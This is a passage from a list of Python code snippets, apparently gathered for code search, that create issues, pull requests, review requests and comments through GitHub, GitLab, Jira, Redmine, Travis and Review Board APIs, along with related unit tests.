\"--project\", default=SCRUM_BOARD_NAME, help=\"project to create issue in\"\n )\n parser.add_argument(\"title\", default=None, nargs=\"?\", help=\"issue title\")\n\n args = parser.parse_args()\n\n # only required arg for creating an issue. 
can be overridden in interactive mode\n title = args.title\n\n # this can be overridden in interactive mode\n body = args.body\n\n if args.interactive:\n with tempfile.NamedTemporaryFile(\"w\") as fh:\n path = fh.name\n\n editor = os.environ.get(\"EDITOR\", os.environ.get(\"VISUAL\", \"vi\"))\n\n proc = getattr(sh, editor)\n\n proc(path, _fg=True)\n\n with open(path, \"r\") as rfh:\n\n # grab top line as title\n title = rfh.readline().replace(\"\\n\", \"\")\n\n # grab remaining lines as body\n body = \"\".join(rfh.readlines())\n\n session = GithubSession()\n\n additional_args = {\n \"assignees\": args.assignees,\n \"body\": body,\n \"labels\": args.labels,\n \"milestone\": args.milestone,\n }\n\n issue = session.create_issue(title, **additional_args)\n\n column_name = args.column\n project_name = args.project\n\n project = session.get_project(project_name)\n column = session.get_column(project, column_name)\n\n # finally, create the card\n session.create_card(column, issue)\n\n print(json.dumps(issue, indent=2))", "async def pr(ctx, number: Option(int, \"Pull request number\")):\n url = f\"{repo}/issues/{number}\"\n view = discord.ui.View()\n view.add_item(discord.ui.Button(label=\"View Pull Request\", url=url))\n await ctx.respond(f\"Here's a link\", view=view)", "def new_review_request(self, changenum=None, submit_as=None, diff_only=False):\r\n try:\r\n data = { 'repository_path': self.info.path }\r\n\r\n if changenum:\r\n data['changenum'] = changenum\r\n\r\n if submit_as:\r\n self.debug('Submitting the review request as %s' % submit_as)\r\n data['submit_as'] = submit_as\r\n\r\n rsp = self.api_call('api/review-requests/new/', data)\r\n except APIError, e:\r\n rsp, = e.args\r\n\r\n if not diff_only:\r\n if rsp['err']['code'] == 204: # Change number in use\r\n self.debug('Review request already exists. 
Updating it...')\r\n rsp = self.api_call(\r\n 'api/review-requests/%s/update_from_changenum/' %\r\n rsp['review_request']['id'])\r\n else:\r\n raise e\r\n\r\n self.debug('Review request created')\r\n return rsp['review_request']", "def create_new_issue(\n self,\n token: str,\n object_id: str,\n customer_id: str,\n project_id: str,\n scope_id: str,\n issue_name: str,\n region: str,\n business_unit: str,\n date_of_raise: str,\n due_date: str,\n nature_of_issue: str,\n criticality: str,\n issue_description: str,\n impact_value: str,\n currency: str,\n impact_on: str,\n document_ref: dict,\n issue_owner: dict,\n resolution_path: str,\n ):\n\n # Type guarding\n assert check_argument_types()\n\n # TODO: make table name environment variable\n table_name = f\"Projects-{customer_id}\"\n\n # Key\n key = {\"projectId\": project_id, \"customerId\": customer_id}\n\n # Projection Expression\n projection_expression = \", \".join([\"projectId\", \"code\"])\n\n # Check if customer and project exist\n logger.info(f\"Checking if project ID or organization ID exists: {key}\")\n response, _ = self._db.read_single_item(table_name, key, projection_expression)\n\n # Get project code\n project_code = response[\"code\"]\n\n # Request body\n dynamo_object = {\n \"scopeId\": scope_id,\n \"issueName\": issue_name,\n \"region\": region,\n \"businessUnit\": business_unit,\n \"dateOfRaise\": date_of_raise,\n \"dueDate\": due_date,\n \"natureOfIssue\": nature_of_issue,\n \"criticality\": criticality,\n \"issueDescription\": issue_description,\n \"status\": \"open\",\n \"impactValue\": impact_value,\n \"currency\": currency,\n \"impactOn\": impact_on,\n \"documentRef\": document_ref,\n \"issueOwner\": issue_owner,\n \"resolutionPath\": resolution_path,\n \"lastUpdated\": str(date.today()),\n \"issueId\": object_id,\n }\n\n # Send project onboarding email\n logger.info(\"Sending project onboarding email\")\n self._email.send_template_email(\n source=getenv(\"SOURCE_EMAIL_ADDRESS\"),\n template_name=getenv(\"ISSUE_ASSIGNMENT_TEMPLATE\"),\n template_data=json.dumps(\n {\n \"issueId\": f'\"{dynamo_object[\"issueName\"]}\"',\n \"projectCode\": project_code,\n }\n ),\n bcc_addresses=[issue_owner[\"email\"]],\n )\n\n # Dynamo update expressions & update\n logger.info(\"Create new project issue\")\n update_expression = (\n f\"SET scopes.#scopeId.issues.#IssueId = :{dynamo_object['issueId']}\"\n )\n expression_attribute_names = {\n \"#scopeId\": scope_id,\n \"#IssueId\": dynamo_object[\"issueId\"]\n }\n expression_attribute_values = {f\":{dynamo_object['issueId']}\": dynamo_object}\n self._db.update_item(\n table_name,\n key,\n update_expression,\n expression_attribute_names,\n expression_attribute_values,\n )\n\n # Log workflow\n message = [f\"Created new issue: {issue_name}\"]\n workflow = Workflows.update_workflows(\n token, \"Create\", message, project_id, dynamo_object[\"issueId\"]\n )\n self._db.create_item(f\"Workflows-{customer_id}\", workflow)\n\n logger.info(\"New issue created successfully\")\n return \"New issue created successfully\", 200", "def test_build_new_review_request(self):\n repository = self._create_repository()\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n config = self._create_config()\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n 
self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://api.travis-ci.org/repo/mypublicorg%2Fmypublicorgrepo/'\n 'requests')\n\n self.assertEqual(\n data['request']['config']['env']['global'],\n [\n 'REVIEWBOARD_STATUS_UPDATE_ID=1',\n 'REVIEWBOARD_TRAVIS_INTEGRATION_CONFIG_ID=%d' % config.pk,\n ])\n\n self.assertEqual(data['request']['message'],\n 'Test Summary\\n\\nTest Description')\n self.assertTrue('git fetch --unshallow origin || true'\n in data['request']['config']['before_install'])\n self.assertTrue('git checkout %s' % diffset.base_commit_id\n in data['request']['config']['before_install'])\n self.assertEqual(data['request']['branch'], 'review-requests')", "def create_issue(self, data, **kwargs):\n raise NotImplementedError", "def create_issue(self, data, **kwargs):\n raise NotImplementedError", "def create(self, comment):\r\n url = self.get_url()\r\n\r\n # when creating commits they don't get wrapped in {\"body\": <comment>}\r\n return http.Request('POST', url, params=comment), parsers.parse_json", "def sendpr(m='This is PR', b='lf-dev', h=None):\n command = 'hub pull-request -m \"%s\" -b %s' % (m,b)\n\n current_branch_cmd = shlex.split('git rev-parse --abbrev-ref HEAD')\n process = subprocess.Popen(current_branch_cmd, stdout=subprocess.PIPE)\n current_branch, err = process.communicate()\n print('current_branch', current_branch)\n if not h:\n cmd = shlex.split(command)\n else:\n command = command + '-h %s' % (h)\n cmd = shlex.split(command)\n current_branch = h\n\n cmd = shlex.split(command)\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n output, err = process.communicate()\n message = m + \" PR from %s @ %s reviewers @%s @%s \\n URL: %s \\n %s >>> %s\" % (DEV_NAME,\n datetime.datetime.now().strftime(\"%y-%m-%d-%H-%M\"),\n REVIEWER[0], REVIEWER[1], output , b,\n current_branch)\n data = {\n \"color\":\"green\",\n \"message\":message,\n \"notify\":True,\n \"message_format\":\"text\"\n }\n req = urllib2.Request(HIPCHAT_WEB_HOOK)\n req.add_header(\"Content-Type\", \"application/json\")\n urllib2.urlopen(req, json.dumps(data))", "def test_issue_create_issue(self):\n pass", "def review(args):\n try:\n pr = gh.get_pr(owner, repo, args.pull_request)\n except requests.exceptions.HTTPError:\n print('Couldn\\'t find pull request #%s in %s/%s.' %\n (args.pull_request, owner, repo))\n print('Make sure the number is correct and that you have read '\n 'permissions for this GitHub repository.')\n sys.exit(1)\n\n clone_url = pr['head']['repo']['clone_url']\n fork_branch = pr['head']['ref']\n fork_owner = pr['head']['repo']['owner']['login']\n\n repo_lib.fetch_fork(clone_url, fork_branch, fork_owner)\n repo_lib.checkout(fork_branch, fork_owner)\n sys.exit(0)", "def test_issue_create_comment(self):\n pass", "def create_comment(self, body):\n return self.client.request(\n \"{}/issues/{}/comments\".format(self.repo.base_path, self.num),\n params={\"body\": body},\n method=\"POST\"\n )", "def pullrequest(self, number):\r\n return pullrequests.PullRequest(self, number)", "def post_to_github(results: List[dict]):\n\n tests_info_body = ''\n has_failed = False\n for result in results:\n if result['status'] == 'passed':\n tests_info_body += f':white_check_mark: `{result[\"command\"]}`\\n'\n else:\n has_failed = True\n tests_info_body += f':x: `{result[\"command\"]}`\\n```{result[\"output\"]}```\\n<br>'\n\n pr_body = 'Whoopsie. Looks like there are some issues with this PR. :space_invader:' if \\\n has_failed else 'This PR is good to go ! 
:tada:'\n\n pr_body += f'\\n\\n<details><summary><strong>Tests</strong></summary><p>\\n\\n{tests_info_body}\\n</p></details>'\n\n try:\n source_repo = '/'.join(os.getenv('CODEBUILD_SOURCE_REPO_URL')[:-4].split('/')[-2:])\n source_commit_hash = os.getenv('CODEBUILD_RESOLVED_SOURCE_VERSION')\n source_pr = int(os.getenv('CODEBUILD_WEBHOOK_PR', '0'))\n\n if source_pr > 0:\n g = Github(os.getenv('GITHUB_API_TOKEN', ''))\n repo = g.get_repo(source_repo)\n pr: PullRequest = repo.get_pull(source_pr)\n\n print(\n f'Creating review comment: '\n f'pr -> {pr.title} // '\n f'commit -> {source_commit_hash} // '\n f'has_failed -> {has_failed}'\n )\n\n pr.create_review(\n repo.get_commit(sha=source_commit_hash),\n pr_body,\n 'REQUEST_CHANGES' if has_failed else 'APPROVE'\n )\n finally:\n if has_failed:\n print('Test(s) failed.')\n exit(1)", "async def create_issue(\n self,\n title: str or None = None,\n body: str or None = None,\n state: str or None = None,\n milestone: int or None = None,\n labels: [str] or None = None,\n assignees: [str] or None = None,\n ):\n _endpoint = f\"/repos/{self.full_name}/issues\"\n\n data = {}\n if title is not None:\n data[\"title\"] = title\n if body is not None:\n data[\"body\"] = body\n if state is not None:\n data[\"state\"] = state\n if milestone is not None:\n data[\"milestone\"] = milestone\n if labels is not None:\n data[\"labels\"] = labels\n if assignees is not None:\n data[\"assignees\"] = assignees\n\n issue = await self.client.post(endpoint=_endpoint, data=data, jsondata=True)\n return AIOGitHubAPIRepositoryIssue(self.client, issue)", "def test_build_new_review_request_with_public_github_repository(self):\n repository = self._create_repository(repository_plan='public')\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n self._create_config()\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://api.travis-ci.org/repo/myuser%2Fmypublicrepo/requests')", "def createmergerequest2(\n self, project_id, sourcebranch, targetprojectid, targetbranch, title, assignee_id=None, sudo=\"\"\n ):\n import requests\n\n url_str = '{0}/{1}/merge_requests'.format(self.projects_url, project_id)\n data = {'source_branch': sourcebranch,\n 'target_project_id': targetprojectid,\n 'target_branch': targetbranch,\n 'title': title,\n 'assignee_id': assignee_id}\n if sudo != \"\":\n data['sudo'] = sudo\n\n request = requests.post(url_str, data=data, headers=self.headers,\n verify=self.verify_ssl)\n if request.status_code == 201:\n return True\n else:\n\n return False", "def issues_insert(self, mar, request):\n if not mar.perms.CanUsePerm(\n permissions.CREATE_ISSUE, mar.auth.effective_ids, mar.project, []):\n raise permissions.PermissionException(\n 'The requester %s is not allowed to create issues for project %s.' %\n (mar.auth.email, mar.project_name))\n\n with work_env.WorkEnv(mar, self._services) as we:\n owner_id = None\n if request.owner and request.owner.name:\n try:\n owner_id = self._services.user.LookupUserID(\n mar.cnxn, request.owner.name)\n except exceptions.NoSuchUserException:\n raise endpoints.BadRequestException(\n 'The specified owner %s does not exist.' 
% request.owner.name)\n\n cc_ids = []\n request.cc = [cc for cc in request.cc if cc]\n if request.cc:\n cc_ids = list(self._services.user.LookupUserIDs(\n mar.cnxn, [ap.name for ap in request.cc],\n autocreate=True).values())\n comp_ids = api_pb2_v1_helpers.convert_component_ids(\n mar.config, request.components)\n fields_add, _, _, fields_labels, _ = (\n api_pb2_v1_helpers.convert_field_values(\n request.fieldValues, mar, self._services))\n field_helpers.ValidateCustomFields(\n mar, self._services, fields_add, mar.config, mar.errors)\n if mar.errors.AnyErrors():\n raise endpoints.BadRequestException(\n 'Invalid field values: %s' % mar.errors.custom_fields)\n\n logging.info('request.author is %r', request.author)\n reporter_id, timestamp = self.parse_imported_reporter(mar, request)\n new_issue, _ = we.CreateIssue(\n mar.project_id, request.summary, request.status, owner_id,\n cc_ids, request.labels + fields_labels, fields_add,\n comp_ids, request.description,\n blocked_on=api_pb2_v1_helpers.convert_issueref_pbs(\n request.blockedOn, mar, self._services),\n blocking=api_pb2_v1_helpers.convert_issueref_pbs(\n request.blocking, mar, self._services),\n reporter_id=reporter_id, timestamp=timestamp,\n send_email=request.sendEmail)\n we.StarIssue(new_issue, True)\n\n return api_pb2_v1_helpers.convert_issue(\n api_pb2_v1.IssuesGetInsertResponse, new_issue, mar, self._services)", "def create_pull_requests(self, repos, key, msrp, summary, cred_hash, qa_title):\n response = {'status': True, 'data': []}\n\n for repo in repos:\n repo_name = repo['repositoryName']\n reviewed_branch = repo['reviewedBranch']\n base_branch = repo['baseBranch']\n\n json_data = {\n \"title\": qa_title,\n \"description\": summary,\n \"state\": \"OPEN\",\n \"open\": True,\n \"closed\": False,\n \"fromRef\": {\n \"id\": f\"refs/heads/{reviewed_branch}\",\n \"repository\": {\n \"slug\": repo_name,\n \"name\": None,\n \"project\": {\n \"key\": self.code_cloud_api.project_name\n }\n }\n },\n \"toRef\": {\n \"id\": f\"refs/heads/{base_branch}\",\n \"repository\": {\n \"slug\": repo_name,\n \"name\": None,\n \"project\": {\n \"key\": self.code_cloud_api.project_name\n }\n }\n },\n \"locked\": False,\n \"reviewers\": [],\n \"links\": {\"self\":[None]}\n }\n\n url = f'{self.code_cloud_api.branch_api}/{repo_name}/pull-requests'\n pull_response = self.code_cloud_api.post_json(\n url=url, \n json_data=json_data, \n cred_hash=cred_hash\n )\n\n if not pull_response['status']:\n response['data'].append({\n 'error': pull_response['data']['errors'][0]['message'],\n 'repo': repo_name\n })\n else:\n response['data'].append({\n 'link': pull_response['data']['links']['self'][0]['href'],\n 'repo': repo_name\n })\n\n return response", "def test_build_new_review_request_with_private_github_repository(self):\n repository = self._create_repository(repository_plan='private')\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n self._create_config()\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://api.travis-ci.org/repo/myuser%2Fmyprivaterepo/requests')", "def create_issue(self, group, form_data, **kwargs):\n headers = { \"X-Redmine-API-Key\": self.get_option('key', group.project),\n 'content-type': 
'application/json' }\n verifySSL = self.get_option('verify_ssl', group.project)\n url = urlparse.urljoin(self.get_option('host', group.project), \"issues.json\")\n payload = {\n 'project_id': self.get_option('project_id', group.project),\n 'tracker_id': self.get_option('tracker_id', group.project),\n 'status_id': '0',\n 'subject': form_data['title'].encode('utf-8'),\n 'description': form_data['description'].encode('utf-8'),\n }\n #print >> sys.stderr, \"url:\", url\n #print >> sys.stderr, \"payload:\\n\", pformat(payload)\n #print >> sys.stderr, pformat(group)\n #print >> sys.stderr, pformat(dir(group))\n\n try:\n r = requests.post(url, data=json.dumps({'issue': payload}), headers=headers, verify=verifySSL)\n except requests.exceptions.HTTPError as e:\n raise forms.ValidationError('Unable to reach Redmine host: %s' % repr(e))\n\n try:\n data = json.loads(r.text)\n except json.JSONDecodeError as e:\n #print >> sys.stderr, \"ERROR: %s\" % e\n #print >> sys.stderr, \"RESP:\", r.text\n raise forms.ValidationError('Unable to reach Redmine host: %s' % repr(e))\n\n if not 'issue' in data or not 'id' in data['issue']:\n raise forms.ValidationError('Unable to create redmine ticket')\n\n return data['issue']['id']", "def test_create_with_existing_new_draft(self):\n review_request = self.create_review_request(\n publish=True,\n bugs_closed='1,20,300',\n commit_id='abc123',\n description_rich_text=True,\n rich_text=True,\n testing_done_rich_text=True,\n extra_data={\n 'key': {\n 'values': [1, 2, 3],\n },\n 'mybool': True,\n })\n\n # Create the first draft.\n orig_draft = ReviewRequestDraft.create(review_request)\n self.assertIsNotNone(orig_draft.changedesc)\n\n # Try to create it again.\n draft = ReviewRequestDraft.create(review_request)\n self.assertIsNotNone(draft.changedesc)\n\n self.assertEqual(orig_draft, draft)\n self.assertEqual(orig_draft.changedesc, draft.changedesc)", "def main(github_token, branch_name, repository, sha):\n create_branch(github_token, branch_name, repository, sha)\n click.echo(f\"Successfully created branch {branch_name}\")", "def post_pr_review(owner, repo,\n commit_sha, pull_number,\n message, event='COMMENT'):\n review = {\n 'commit_id': commit_sha,\n 'body': message,\n 'event': event,\n }\n\n res = post(GIT_PULL_REVIEW_URL.format(host=host_api,\n owner=owner,\n repo=repo,\n pull_number=pull_number),\n json=review, auth=auth)\n assert res.status_code == 200, f'Got non 201 status, ' \\\n f'error message: {res.content}'", "def test_build_new_review_request_with_private_org_github_repository(self):\n repository = self._create_repository(repository_plan='private-org')\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n self._create_config()\n self.integration.enable_integration()\n\n data = self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://api.travis-ci.org/repo/'\n 'myprivateorg%2Fmyprivateorgrepo/requests')", "def _create_issue(self, dep_name, dep_latest_version, is_subtask=False, parent_key=None):\n logging.info(\"Creating a new JIRA issue to track {0} upgrade process\".format(dep_name))\n assignee, owners = self._find_owners(dep_name)\n summary = _ISSUE_SUMMARY_PREFIX + dep_name\n if dep_latest_version:\n summary = summary + \" \" + dep_latest_version\n description = 
\"\"\"\\n\\n{0}\\n\n Please review and upgrade the {1} to the latest version {2} \\n \n cc: \"\"\".format(\n datetime.today(),\n dep_name,\n dep_latest_version\n )\n for owner in owners:\n description += \"[~{0}], \".format(owner)\n try:\n if not is_subtask:\n issue = self.jira.create_issue(summary, [_JIRA_COMPONENT], description, assignee=assignee)\n else:\n issue = self.jira.create_issue(summary, [_JIRA_COMPONENT], description, assignee=assignee, parent_key=parent_key)\n except Exception as e:\n logging.error(\"Failed creating issue: \"+ str(e))\n raise e\n return issue", "def test_is_new_pr(requests_mock):\n from AzureDevOps import Client, is_new_pr\n\n authorization_url = 'https://login.microsoftonline.com/organizations/oauth2/v2.0/token'\n requests_mock.post(authorization_url, json=get_azure_access_token_mock())\n\n project = 'test'\n repository = 'xsoar'\n\n url = f'{BASE_URL}/{project}/_apis/git/repositories/{repository}/pullrequests/'\n\n mock_response = json.loads(load_mock_response('list_pull_request.json'))\n requests_mock.get(url, json=mock_response)\n\n client = Client(\n client_id=CLIENT_ID,\n organization=ORGANIZATION,\n verify=False,\n proxy=False,\n auth_type='Device Code')\n\n assert is_new_pr(project, repository, client, 23)\n assert is_new_pr(project, repository, client, 22)\n assert not is_new_pr(project, repository, client, 24)\n assert not is_new_pr(project, repository, client, 25)", "def __create_ticket(user, subject, description, topic):\n\n target = settings.SLACK_TARGET_TFED\n if topic == 'Database':\n target = settings.SLACK_TARGET_TFED_DB\n user_email = user['user']['profile'].get('email', 'lnl-no-reply@wpi.edu')\n display_name = user['user']['profile']['real_name']\n resp = rt_api.create_ticket(topic, user_email, subject, description + \"\\n\\n- \" + display_name)\n ticket_id = resp.get('id', None)\n if ticket_id:\n ticket_info = {\n \"url\": 'https://lnl-rt.wpi.edu/rt/Ticket/Display.html?id=' + ticket_id,\n \"id\": ticket_id,\n \"subject\": subject,\n \"description\": description,\n \"status\": \"New\",\n \"assignee\": None,\n \"reporter\": user['user']['name']\n }\n ticket = views.tfed_ticket(ticket_info)\n slack_post(target, text=description, content=ticket, username='Request Tracker')\n return\n error_message = \"Whoops! It appears something went wrong while attempting to submit your request. \" \\\n \"Please wait a few minutes then try again. 
If the problem persists, please email \" \\\n \"us directly at tfed@wpi.edu.\"\n post_ephemeral(target, error_message, user['user']['id'], username=\"Request Tracker\")", "def new_repo(req, source, psp_dir, url_helper=None):\n req.content_type = 'text/html'\n repo_dir = req.filename.rsplit('/', 1)[0]\n files = [f for f in os.listdir(repo_dir) if f[-3:] == '.h5']\n top_level = psp.PSP(req, filename=psp_dir+'new_repo.psp')\n top_level.run({'context': req.uri,\n 'files': files})", "def api_repo_create():\n form = NewRepoForm()\n if form.validate_on_submit():\n # On the miniscule chance we generate a non-unique access key, loop and try again.\n success = False\n while not success:\n new_repo = Repo.create(\n pass_phrase = form.pass_phrase.data,\n title = form.title.data,\n description = form.description.data,\n is_private = form.is_private.data\n )\n db.session.add(new_repo)\n try:\n db.session.commit()\n success = True\n except:\n db.session.rollback()\n success = False\n session['working_repo'] = new_repo.access_key\n return jsonify(message='success', created=new_repo.access_key)\n else:\n return jsonify(message=\"failed\", errors=form.errors_to_json()), 400", "def submit_feedback(self, title, description, state):\n\n body = f\"\"\"\n**User Issue**\nEmail: {self.user.email}\nUser Agent: {get_user_agent(self.request)}\n\n{description}\n\n<details>\n\n<summary>Redux state</summary>\n\n<p>\n\n```json\n{json.dumps(state, indent=2)}\n```\n\n</p>\n</details>\n \"\"\"\n\n r = requests.post(\n 'https://api.github.com/repos/alexmojaki/futurecoder/issues',\n json={'title': title,\n 'body': body,\n 'labels': ['user', 'bug']},\n headers=dict(\n Authorization='token ' + settings.GITHUB_TOKEN,\n ),\n )\n\n assert r.status_code == 201", "def test_new_Issue(self, requests_post, get_landowner):\n #requests_post.status_code.return_value = 200\n requests_post.json.return_value = {'features': []}\n get_landowner.return_value = 'TEST landowner'\n cat = Category(name=\"test category\")\n cat.save()\n issue = Issue(description=\"test issue\", position=Point(5, 23), category=cat)\n issue.save()\n self.assertEqual(len(Issue.objects.all()), 1)\n issue = Issue(id=666, description=\"test issue with defined id\", position=Point(5, 23), category=cat)\n issue.save()\n self.assertEqual(issue.id, 666)", "def create_branch_from_issue(jira_url, jira_username, jira_api_key, project_key, source_branch_name, issue_key):\n click.echo('Branch \"{}\" was created'.format(\n create_branch_func(\n source_branch_name, get_branch_name(jira_url, jira_username, jira_api_key, issue_key, project_key)\n )\n ))", "def create(self, number, message, user=None, repo=None):\n request = self.make_request('issues.comments.create', user=user,\n repo=repo, number=number, body={'body': message})\n return self._post(request)", "def createRequest(self):\n self.get_bmc_website()\n self.__createChangeRequest = Create(self.browser)\n self.__createChangeRequest.createNCR()", "def create_repo_cli(api_client, url, provider, path):\n content = ReposApi(api_client).create(url, provider, path)\n click.echo(pretty_format(content))", "def test_issue_create_milestone(self):\n pass", "def createcomment(request, pk):\n issue = get_object_or_404(Issue, pk=pk)\n if request.method == \"POST\":\n form = CommentCreationForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.issue = issue\n comment.author = request.user\n comment.created_at = timezone.now()\n comment.save()\n return redirect('office:issue', pk=pk)\n else:\n form = 
CommentForm()\n return render(request, 'blog/add_comment_to_post.html', {'form': form})", "def test_create_project_request(self):\n pass", "def create_issue_request(\n pk: PublicKey,\n user_attributes: AttributeMap\n ) -> Tuple[IssueRequest, Bn]:\n attributes = [Bn.from_binary(a_i) for a_i in user_attributes.values()]\n Y1s = [pk.Y1[a] for a in user_attributes.keys()]\n\n # Calculate C\n t = G1.order().random()\n C = pk.g1 ** t\n for Y1_i, a_i in zip(Y1s, attributes):\n C *= Y1_i ** a_i\n\n # Proof that C has been calculated correctly\n proof = FiatShamirProof(\n G1, C, pk, # type:ignore\n [pk.g1] + Y1s, # type:ignore\n [t] + attributes\n )\n\n return IssueRequest(C, proof), t", "def create(self, request):\n lot = Lot.objects.get(pk=request.data[\"lotId\"])\n\n project = Project()\n project.name = request.data[\"name\"]\n project.estimatedCost = request.data[\"estimatedCost\"]\n project.estimatedCompletionDate = request.data[\"estimatedCompletionDate\"]\n project.lotId = lot\n #projectNote=projectNote\n\n\n try:\n project.save()\n serializer = ProjectSerializer(project, context={'request': request}) #converting data into json\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n except ValidationError as ex:\n return Response({\"reason\": ex.message}, status=status.HTTP_400_BAD_REQUEST)", "def make_submission(commit: CommitDetails):\n\n submitter, commit_id = commit.submitter, commit.commit_id\n\n subprocess.run(f\"git checkout --force {commit_id}\", shell=True, stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL, cwd=f\"{SUBS_DIR}/{submitter}/{ASSIGNMENT}\", check=True)\n\n submission_path = os.path.realpath(f\"{SUBS_DIR}/{submitter}/{ASSIGNMENT}\")\n subprocess.run(f\"./add_sub_manually.sh {submission_path}\", shell=True, check=False)", "def create_request(v1):\n #get entered data\n data = request.get_json()\n\n #picking the request attributes\n req_title = data.get(\"request_title\")\n req_desc = data.get(\"request_description\")\n requester_name = \"Gideon\"\n req_id = len(all_requests) +1 # + random.randint(1, 3000)\n\n #validation\n if not req_title:\n return jsonify({\"message\": \"Request has no title\"}), 400\n if not req_desc:\n return jsonify({\"message\": \"Request has no description\"}), 400\n if not requester_name:\n return jsonify({\"message\": \"Request must be issued by a user\"}), 400\n if not req_id:\n return jsonify({\"message\": \"Request has no id\"}), 400\n\n #storing entered request\n new_request = MaintenanceRequest(req_title, req_desc, requester_name, req_id)\n all_requests.append(new_request)\n # new_number_of_requests = len(all_requests)\n\n return jsonify({\n \"message\":\"sucessfully created request\",\n 'request_title':new_request.title,\n \"request_description\":new_request.description,\n \"requester_name\" : new_request.requester_name,\n \"request_id\" : new_request.request_id\n })", "def test_build_new_review_request_with_parent_diff(self):\n repository = self._create_repository()\n review_request = self.create_review_request(repository=repository)\n diffset = self.create_diffset(review_request=review_request)\n diffset.base_commit_id = '8fd69d70f07b57c21ad8733c1c04ae604d21493f'\n diffset.save()\n\n filediff = self.create_filediff(diffset)\n filediff.parent_diff = (\n b'--- README\\trevision 123\\n'\n b'+++ README\\trevision 123\\n'\n b'@@ -1 +1 @@\\n'\n b'-Hello, world!\\n'\n b'+Hello, everybody!\\n'\n )\n filediff.save()\n\n config = self._create_config(enterprise=True)\n self.integration.enable_integration()\n\n data = 
self._spy_on_make_request()\n\n review_request.publish(review_request.submitter)\n\n self.assertTrue(TravisAPI._make_request.called)\n\n self.assertEqual(\n data['url'],\n 'https://travis.example.com/api/repo/'\n 'mypublicorg%2Fmypublicorgrepo/requests')\n\n self.assertEqual(\n data['request']['config']['env']['global'],\n [\n 'REVIEWBOARD_STATUS_UPDATE_ID=1',\n 'REVIEWBOARD_TRAVIS_INTEGRATION_CONFIG_ID=%d' % config.pk,\n ])\n self.assertEqual(data['request']['message'],\n 'Test Summary\\n\\nTest Description')\n self.assertTrue('git checkout %s' % diffset.base_commit_id\n in data['request']['config']['before_install'])\n self.assertEqual(data['request']['branch'], 'review-requests')\n\n patch_count = len(\n [cmd for cmd in data['request']['config']['before_install']\n if 'patch -p1' in cmd])\n\n self.assertEqual(patch_count, 2)", "def create(self, token: Any):\n params = [token, ]\n method = \"ProjectAPI.Create\"\n self.__add_request(method, params, lambda payload: Definition.from_json(payload))", "def create_project():\n client = RequestManager()\n project_name = \"\".join(choices(string.ascii_letters + string.digits, k=10))\n client.set_method(\"POST\")\n client.set_endpoint(\"/projects\")\n body = {\"name\": project_name}\n client.set_body(json.dumps(body))\n response = client.execute_request()\n STORED_ID['project_id'] = response.json()['id']", "def workon(ctx, issue_id, new, base_branch):\n lancet = ctx.obj\n\n if not issue_id and not new:\n raise click.UsageError(\"Provide either an issue ID or the --new flag.\")\n elif issue_id and new:\n raise click.UsageError(\n \"Provide either an issue ID or the --new flag, but not both.\"\n )\n\n if new:\n # Create a new issue\n summary = click.prompt(\"Issue summary\")\n issue = create_issue(\n lancet, summary=summary, add_to_active_sprint=True\n )\n else:\n issue = get_issue(lancet, issue_id)\n\n username = lancet.tracker.whoami()\n active_status = lancet.config.get(\"tracker\", \"active_status\")\n if not base_branch:\n base_branch = lancet.config.get(\"repository\", \"base_branch\")\n\n # Get the working branch\n branch = get_branch(lancet, issue, base_branch)\n\n # Make sure the issue is in a correct status\n transition = get_transition(ctx, lancet, issue, active_status)\n\n # Make sure the issue is assigned to us\n assign_issue(lancet, issue, username, active_status)\n\n # Activate environment\n set_issue_status(lancet, issue, active_status, transition)\n\n with taskstatus(\"Checking out working branch\") as ts:\n lancet.repo.checkout(branch.name)\n ts.ok('Checked out working branch based on \"{}\"'.format(base_branch))\n\n with taskstatus(\"Starting harvest timer\") as ts:\n lancet.timer.start(issue)\n ts.ok(\"Started harvest timer\")", "def review_pr(ctx, slug, token, merge, pr):\n\n # Allow the 'pr' parameter to be either the numerical ID or an URL to the PR on GitHub.\n # Also if it's an URL, parse the proper --slug argument from that.\n m = re.match('^(?:https?://(?:www\\.)?github\\.com/([^/]+/[^/]+)/pull/)?([0-9]+)$', pr, re.IGNORECASE)\n if not m:\n click.echo(\"Error: parameter to 'nox-review pr' must be a valid pull request number or URL.\")\n sys.exit(1)\n pr = m[2]\n if m[1]:\n if slug:\n click.echo(\"Error: '--slug' option can't be used together with a pull request URL.\")\n sys.exit(1)\n slug = m[1]\n elif not slug:\n slug = 'NixOS/nixpkgs'\n\n pr_url = 'https://api.github.com/repos/{}/pulls/{}'.format(slug, pr)\n headers = {}\n if token:\n headers['Authorization'] = 'token {}'.format(token)\n request = requests.get(pr_url, 
